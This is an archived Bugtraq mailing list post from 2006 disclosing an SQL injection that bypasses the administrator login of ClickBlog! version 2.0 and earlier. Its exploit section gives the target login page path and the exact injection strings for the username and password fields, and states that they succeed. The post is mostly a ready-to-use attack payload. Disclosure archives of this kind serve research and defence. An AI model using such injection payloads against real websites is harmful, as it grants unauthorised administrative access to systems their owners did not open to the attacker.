Bugtraq mailing list archives

ClickBlog! <= v2.0 (default.asp) Admin ByPASS SQL Injection

From: ajannhwt () hotmail com
Date: 14 Sep 2006 20:02:42 -0000

ENGLISH

# Title  :  ClickBlog! <= v2.0 (default.asp) Admin ByPASS SQL Injection

# Author :   ajann

# Exploit;

//Before join login page
http://[target]/[path]/default.asp

Username : ' or '
Password : ' or ' and Login Ok

# ajann,Turkey

Current thread:

ClickBlog! <= v2.0 (default.asp) Admin ByPASS SQL Injection ajannhwt (Sep 15)